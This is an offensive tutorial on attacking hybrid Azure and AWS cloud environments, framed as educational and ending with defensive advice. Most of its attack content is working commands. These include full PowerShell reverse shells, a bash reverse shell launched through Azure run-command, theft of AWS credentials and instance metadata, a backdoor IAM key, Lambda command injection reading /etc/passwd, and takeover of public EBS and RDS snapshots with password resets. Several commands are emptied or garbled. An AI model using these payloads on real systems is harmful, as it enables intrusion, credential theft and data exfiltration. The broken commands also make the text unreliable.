Attacks on clouds. Azure and AWS hacking guide

The migration of IT infrastructure to clouds is not just a tribute to fashion: this approach allows to save on technical support, backup, and administration. In addition, cloud-based infrastructure is believed to be more resistant to failures and external attacks. But the bitter truth is that even the most popular hybrid cloud services, including Azure and AWS, can be hacked. In this article, I will address basic techniques used to attack cloud environments.


All information provided in this article is intended for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication.

For clarity purposes, an attack against a cloud infrastructure is shown below.

Hybrid cloud infrastructure
Hybrid cloud infrastructure

As you can see, the attacked organization uses servers and services of various providers, as well as on-premises servers. The servers and services interact with each other as required for business operations. Imagine that an attacker gains remote access to a compromised on-premises server. The possible attack scenarios are discussed below.

Internal intelligence collection: detection of cloud services used by the attacked organization

If you have access to an on-premises Linux server, your primary objective is to remain unnoticed as long as possible. The best way to ensure this is to use services whose actions and requests are permitted in the system. Utilities for remote interaction with cloud infrastructure are optimally suited for this role.

To find out whether the server communicates with clouds, you can analyze the history of commands, running processes, installed packages, etc.

Data collection with Az utility

The Azure command-line interface (Azure CLI) includes a set of commands used to create and manage Azure resources. Azure CLI is available in various Azure services; its main purposes are to simplify, expedite, and automate your interaction with Azure. By default, the az login command is used to log into an Azure profile.

Logging into the Azure profile with az login
Logging into the Azure profile with az login

In this particular case, the Linux server has access to the Azure infrastructure, which allows you to collect plenty of useful information. For instance, using the az account list command, you can review the subscription information of the authorized Azure user.

List of subscriptions
List of subscriptions

The az account show --query "id" directive allows to get the account ID, while the command below

az resource list --query "[?type=='Microsoft.KeyVault/vaults']"

retrieves the key vault information.

Key Vault a tool enabling you to securely store and access keys in hardware security modules (HSM). The keys and other secrets (e.g. passwords) stored in it are encrypted. As you understand, Key Vault must be properly configured; otherwise, something terrible may happen (see the screenshot below).

Consequences of Key Vault misconfiguration
Consequences of Key Vault misconfiguration

Below are a few more commands used to extract important information from Azure:

  • az resource show --id /subscriptions/| grep -E enablePurgeProtection|enableSoftDelete – check whether Key Vault can be restored;
  • az keyvault secret list --vault-name name --query [*].[{"name"},{"enabled":attributes.enabled},{"expires":attributes.expires}] – check the expiry date of the secret key kept in Key Vault;
  • az keyvault secret list --vault-name KeyVaultdatasecure --query '[].id' – get URL for Key Vault;
  • az keyvault secret show --id – get data stored in Key Vault; and
  • az network nsg list --query [*].[name,securityRules] – get information on the Azure network security policy.
Output of the command `az keyvault secret show --id`
Output of the command `az keyvault secret show –id`

Using these commands, you can see the security policy settings in the attacked network, including policy names, groups, and configurations. Note that access, destinationPortRange, protocol, and direction tags indicate that the server allows external connections. Establishing a remote connection to the command-and-control (C&C) server significantly simplifies the attacker’s job and increases the chance to avoid detection.

A number of signs indicate that the server allows external connections
A number of signs indicate that the server allows external connections

Data collection with the AWS utility

AWS CLI is a unified tool designed to manage AWS services. It allows to control numerous AWS services using the command line and to automate these services with scripts.

If the AWS utility is installed on the compromised PC, you can check whether the AWS profile is configured. Linux computers store the AWS config data in the file ~/. aws/credentials; Windows computers store this information in C:\Users\ USERNAME \. aws\credentials. This file may contain inter alia credentials to the respective AWS account (access key ID, secret access key, and session token). The stolen credentials can be subsequently used to establish remote access.

Extracting AWS CLI configuration data
Extracting AWS CLI configuration data

The following AWS CLI commands are used to collect information on the cloud infrastructure present in the attacked network:

  • aws sts get-caller-identity – display information about the IAM identity used to authenticate the request (i.e. the IAM user);
  • aws iam list-users – list IAM users;
  • aws s3 ls – list all available AWS S3 instances;
  • aws lambda list --functions – list all lambda functions;
  • aws lambda get-function --function-name [function_name] – collect additional info on lambda variables, location, etc.;
  • aws ec2 describe-instances – list all available VMs;
  • aws deploy list-applications – list all available web services; and
  • aws rds describe-db-instances – show all available RDS DB instances.
Displaying information on available RDS databases
Displaying information on available RDS databases

The list of commands used to collect information on compromised hosts can be continued. For instance, the history command shows commands that were recently executed on the target PC.

Privilege escalation and lateral movement


To establish a foothold in the system, you can create an iamadmin account with secret keys and use it as a backdoor. To do so, enter the command

aws iam create-access-key --user-name iamadmin
Creating an account to establish a foothold in the system
Creating an account to establish a foothold in the system

Using SSH commands, you can connect to a remote AWS bucket.

Connecting to AWS bucket over SSH
Connecting to AWS bucket over SSH

This is how lateral movement can be used to gain access to AWS infrastructure. If you exploit SSH, make sure to check the following directories and folders:

  • .ssh/authorized_keys – contains public keys for all authorized users;
  • .ssh/id_rsa – contains private user keys;
  • .ssh/ – contains public keys for the user; and
  • .ssh/known_hosts – contains the collection of known host keys.


Imagine that you have retrieved account credentials and collected enough information to conclude that several virtual machines and services are present in the Azure infrastructure. Virtual machines in Azure are similar to ‘regular’ VMs running in a virtual environment and support the standard set of commands. So, you launch Nmap on one of the AWS VMs:

nmap -sS -sV -v -Pn -p- <IP address >
Running Nmap on a VM
Running Nmap on a VM

As you can see, Apache is running on port 80 of the remote VM. Access settings in the Azure environment are normally configured using Azure network group rules. Accordingly, you must be careful and make sure to change the test settings. It turns out that you are dealing with a web app that tests the status of machines running in the cloud. Below is an example showing how a vulnerability in a web app can give you access to a remote VM in Azure.

DirBuster was used to brute-force the user’s logon credentials, and it brought me to the admin logon page. It turned out that the app is vulnerable to enumeration of users and password brute-forcing. Burp Suite can be used to brute-force the password.

Admin logon page in the web app
Admin logon page in the web app

The app is vulnerable to remote command execution.

Executing a command on the remote host
Executing a command on the remote host

I see that this is a Windows PC and decide to run a shell on it. First of all, I have to launch a listener on the attacking machine. For that purpose, I use netcat and execute the command nc -lvp 9090 that starts a listener on port 9090 and switches it to the waiting mode (so that the listener is waiting for a remote TCP connection).

I can either use a premade PowerShell reverse shell shown or upload to the remote host my own shell because shells available online can be detected by antiviruses and EDP systems. Below are two examples of PowerShell shells that can be used on a remote PC.

Shell #1

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP,9090);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Shell #2

$client = New-Object System.Net.Sockets.TCPClient("IP",9090);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

As soon as you get a shell, you can start post-exploitation and continue lateral movements.

The power of Azure Run: getting a shell

One of the more exciting features in Azure is run command: it allows you to remotely execute commands without SSH or RDP access. Run command can be used in combination withaz group list that lists groups on the target machine.

Listing groups with az group list
Listing groups with az group list

The az vm list -g GROUP-NAME command lists VMs in a given group.

Listing all VMs in the group
Listing all VMs in the group

So, I see that this is a Linux VM that potentially can be exploited. I run the following command on it:

az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "id"
Running a command on remote VM
Running a command on remote VM

The command below gives me a shell on a Linux computer:

az vm run-command invoke -g bapawsazureresourcegroup2 -n test-vm1 --command-id RunShellScript --scripts "bash -c "bash -i >& /dev/tcp/ 0>&1"

The same operations can be performed on a Windows PC as well. For instance, you can use the following command:

az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunPowerShellScript --scripts "whoami"

Manipulations on the target host and Azure post-exploitation

Stealing metadata from Azure VM

Because you already have access to one VM in Azure, you can try to extract metadata from it using the command below:

curl -UseBasicParsing -Headers @{"Metadata"="true"} ''
Extracting metadata from an Azure VM
Extracting metadata from an Azure VM

Checking the public IP address of the node:

curl -UseBasicParsing -Headers @{"Metadata"="true"} ''
Checking public IP address
Checking public IP address

If the VM has Internet access, this significantly simplifies the attacker’s job. You can also try to collect data through OSINT and use the obtained information to get access from the outside.


Stealing metadata from AWS

After getting access to Amazon Elastic Compute Cloud (EC2), I can attack any of the EC2 aspects, including not only web apps or services, but the cloud service access as well.


In the course of the EC2 configuration, the user can create a pair of SSH keys. After the EC2 creation, the Windows infrastructure provides a file for RDP and an account. One of the basic security settings is the “Security Groups” section where the user can allow access to certain ports and IP addresses (similar to a firewall).

EC2 metadata are the data pertaining to an EC2 instance. They are not encrypted and can be retrieved from the EC2 if the computer can be accessed locally. The example below shows how to obtain important information about users’ accounts using a vulnerability present on the server side. The curl command can be used to check the EC2 instance metadata.

curl -v

The command output is shown on the screenshot below.

Output of the curl command
Output of the curl command is the default local address accessible only from the EC2 instance. Each AWS product has a unique ID. It can be obtained using the command:


To check the EC2 public address, I use the command:


The Ec2-metadata command displays the general EC2 metadata.

Reviewing EC2 metadata
Reviewing EC2 metadata

To find out the public IP address, I use the Ec2-metadata -v command. After getting the public address, I can deliver an attack from the outside. First of all, it is necessary to check with Nmap whether this IP is available.

Scanning the target host with Nmap
Scanning the target host with Nmap

As you can see, the host runs a vulnerable version of SSH; this gives me additional attack vectors.

Stealing IAM accounts and setting up remote access

To view the IAM information, I enter a command in the following format:


The command below allows to get extended data, including the accessID, SecretAccessKey, and Token:

Reviewing IAM data
Reviewing IAM data

The following data are required to deliver an attack using a stolen IAM account:

  • aws_access_key_id;
  • aws_secret_access_key;
  • aws_session_token.

To configure a compromised IAM account for remote access, I have to create a new profile using the stolen data:

aws configure --profile hackme
Creating a profile using stolen data
Creating a profile using stolen data

After creating the profile, it is necessary to add a token to gain the fully featured remote access. This can be done manually by editing the ~/.aws/credentials file.

Creating a token for fully featured remote access
Creating a token for fully featured remote access

You can create an unlimited number of profiles on one PC, but you must not alter the default profile.

AWS exploitation with nimbostratus

Nimbostratus was originally created as a test utility for AWS. However, it can also be used to steal account credentials from compromised EC2 instances, extract metadata, create IAM users, interact with RDS images, etc. For, instance, to get metadata, type:

python nimbostratus dump-ec2-metadata
Nimbostratus extracts metadata
Nimbostratus extracts metadata

Exploiting services

Exploiting vulnerabilities in AWS Lambda

AWS Lambda is a platform-based service provided by Amazon as a part of Amazon Web Services. This computing service runs code in response to events and automatically manages the computing resources required by that code. The following aspects should be taken into account when testing AWS Lambda:

  • Is access to Lambda provided via a gateway or via AWS triggers? and
  • Vulnerabilities are most often discovered during injection tests and fuzzing; normally, they originate from misconfigurations on the server side.

For instance, if you insert a semicolon and a command into a string containing an URL, you will see that this command is executed due to a vulnerability on the server side.

Exploiting command injection in AWS Lambda
Exploiting command injection in AWS Lambda

For instance, the id command can be executed on a remote PC as follows:


The command below allows to look into /etc/passwd.

curl https://API-endpoint/api/hello;cat%20%2fetc%2fpasswd;w

The following directive is used to copy the retrieved information to a text file:

curl;cat%20%2fetc%2fpasswd;w > pass.txt

Another important feature of Lambda is a temporary token provided in the form of an environment variable. Use the printenv command to view it:


After stealing the AWS credentials and adding them to the AWS command line interface, you can try to load lambda code. This is necessary if you want to find out what lambda functions are running in the target environment and locate confidential information.

The aws lambda list-functions command lists lambda functions available for the current profile. Its output is shown on the screenshot below.

Lambda functions available for the current profile
Lambda functions available for the current profile

Use the command below to get a link allowing to download a specific lambda function.

aws lambda get-function --function-name <FUNCTION-NAME>

As soon as the code is downloaded to your PC, you can check whether it contains vulnerabilities and/or confidential information.

Exploiting cloud storage on AWS

For obvious reasons, cloud drives are of utmost interest for an attacker. AWS S3 and EBS (Elastic Block Store) often have vulnerabilities and misconfigurations that can be discovered during the intelligence collections.

The AWSBucketDump tool is used to quickly collect information about AWS S3. Similar to SubBrute, it brute-forces AWS S3. In addition, AWSBucketDump has features automating the identification and download of sensitive information. To run AWSBucketDump, enter the command:

python -D -l BucketNames.txt -g s.txt

The script creates a file called interesting_file.txt and saves its findings there.

AWSBucketDump script collects sensitive data and saves them in a text file
AWSBucketDump script collects sensitive data and saves them in a text file

To find out whether the S3 storage you are looking for actually exists or not, select any AWS URL and check the HTTP response. An existing bucket will return either ListBucketResult or AccessDenied.

Checking whether the target S3 exists
Checking whether the target S3 exists

If the HTTP Response at $ is NoSuchBucket, the target bucket does not exist.

No such bucket
No such bucket

The AWS utility allows to request information about S3 ACL (the command aws s3api get-bucket-acl --bucket bucket-name).

Output of the command aws s3api
Output of the command aws s3api

Readable and writable objects are marked as FULL_CONTROL in the ACL. You can create files in such a bucket remotely using any AWS account. Files can be uploaded with the aws utility using any profile; to check the presence of the uploaded file, type:

aws s3 cp readme.txt s3://bucket-name-here --profile newuserprofile
aws s3 ls s3://bucket-name-here --profile newuserprofile

In the console, this operation looks as follows.

Uploading a file and checking it
Uploading a file and checking it

Amazon Elastic Block Store (Amazon EBS) provides persistent block storage volumes to be used with Amazon EC2 in AWS Cloud. Each Amazon EBS volume is automatically replicated in its own availability zone. To find publicly available EBS snapshots with specific patterns, use the grep command:

aws ec2 describe-snapshots --region us-east-1 --restorable-by-user-ids all | grep -C 10 "company secrets"
Output of the grep command
Output of the grep command

The following command allows to get an availability zone and EC2 ID:

aws ec2 describe-instances --filters Name=tag:Name,Values=attacker-machine

Now you can create a new volume using the found snapshot:

aws ec2 create-volume --snapshot-id snap-03616657ede4b9862 --availability-zone us-east-1b

After creating a volume, note its VolumeID. The newly-created volume can be attached to the EC2 computer using the EC2 instance ID and the new volume ID. The command syntax is as follows:

aws ec2 attach-volume --device /dev/sdh --instance-id i-05a977acccaa51bd6 --volume-id vol-018bd5c117c410f23
Attaching the newly-created volume
Attaching the newly-created volume

The aws ec2 describe-volumes --filters Name=volume-id,Values=vol-018bd5c117c410f23 command is used to check the status of the attached volume. If everything is OK, the server will respond: in use.

Checking the attached volume
Checking the attached volume

After attaching a volume, you can determine its partition using the lsblk command and mount it for subsequent analysis.

AWS relational databases

In the case of AWS, cloud databases constitute a relational database service that allows users to create databases in the cloud and connect to them from any location. Database configurations often contain errors that can be exploited by attackers.

The possible misconfigurations include weak security policies and weak passwords that make the RDS publicly accessible.

An example demonstrating the exploitation of a weak password and access roles is shown below: during the exploitation of a web app, an SQL injection was detected and user’s hashes retrieved.

Hashes retrieved using an SQL injection
Hashes retrieved using an SQL injection

The hash-identifier utility can be used to determine the hash type. For instance, to get a password for the user rdsroot, run hashcat as shown below:

hashcat -m 300 -a 0 D1DBA23DC29396BCDAE208D3AF7AF9F065CF3CC4 wordlist.txt

To connect to the database, use the standard MySQL client.

Connecting to the database
Connecting to the database

After getting access to the RDS, you can try to dump the database. This can be done in many ways, for instance, with an SQL injection or in the AWS console that enables you to mount an RDS snapshot. To get access to the data, reset the password to these snapshots.

RDS snapshots can be accessible from the outside. If the snapshot ID is available, this snapshot can be mounted on the attacker’s machine. To find the required ID using the AWS utility, enter the following command:

aws rds describe-db-snapshots --include-public --snapshot-type public --db-snapshot-identifier arn:aws:rds:us-east-1:159236164734:snapshot:globalbutterdbbackup
AWS searches for the snapshot ID
AWS searches for the snapshot ID

To restore the snapshot as a new instance, use the command below:

aws rds restore-db-instance-from-db-snapshot --db-instance-identifier recoverdb --publicly-accessible --db-snapshot-identifier arn:aws:rds:us-east-1:159236164734:snapshot:globalbutterdbbackup --availability-zone us-east-1b

After restoring the instance, you can check whether it’s working and then connect to it:

aws rds describe-db-instances --db-instance-identifier recoverdb

DBInstanceStatus indicates the status of the instance. When backup is completed, the DBInstanceStatus value will change to available.

Checking status of the object
Checking status of the object

Now you can reset the password for MasterUsername and log in:

aws rds modify-db-instance --db-instance-identifier recoverdb --master-user-password NewPassword1 --apply-immediately

The nc rds-endpoint 3306 --zvv command checks whether the MySQL RDP is running and whether it allows connections. The standard MySQL client is used to connect to the database and extract data from it.

Azure cloud storage

Azure Storage is a cloud storage that contains Azure drops, data lake storage instances, files, queues, and tables. Misconfigurations may cause leaks of sensitive data and put other services at risk.

Azure drops are equivalent to AWS S3 instances and allow you to store objects. These objects can be accessed over HTTP using a specially generated URL.

The screenshot below shows an example of misconfigured access rights to files stored in Azure.

Incorrect configuration of access rights to files stored in Azure
Incorrect configuration of access rights to files stored in Azure

Incorrectly granted privileges allow you to see what files are stored in Azure drops and delete them. As a result, confidential data may be lost, and other services may be disrupted.

The Azure drops’ addresses are fully qualified domain names (FQDNs) that contain A records. The A records, in turn, indicate that these IP addressees belong to Microsoft Azure. Therefore, to find Azure Blob objects you can use any subdomain enumeration tool that checks either for an A record in the domain name or for HTTP status codes.

For instance, the dnsscan utility can be used for this purpose. For better results, I suggest using your own wordlists. To search for subdomains with a basic wordlist, use the following command:

python -d -w subdomains-100.txt

The command output is shown below.

Dnsscan searches for subdomains
Dnsscan searches for subdomains

It’s not a bid deal to find Azure cloud databases accessible from the network. The endpoint name of an Azure SQL database server has the following format: ??; accordingly, search online for this specific string. Names of database endpoints and potential accounts can be found using Google search or subdomain search.


Even if your infrastructure has been moved to the cloud, this does not mean that you can forget about security risks: they still exist and pose threats to your network. In this article, I addressed just the basic techniques used by hackers to attack apps in Azure. Hopefully, this information will help you to avoid the mains risks.

In hybrid cloud environments, data are stored both on-premises and in the clouds. Accordingly, the information security in such networks requires a complex approach. Penetration testing is the best way to assess the safety of your data and identify weaknesses able to compromise the infrastructure. To protect your network against data leaks, continuously monitor its compliance with the security standards and be vigilant!

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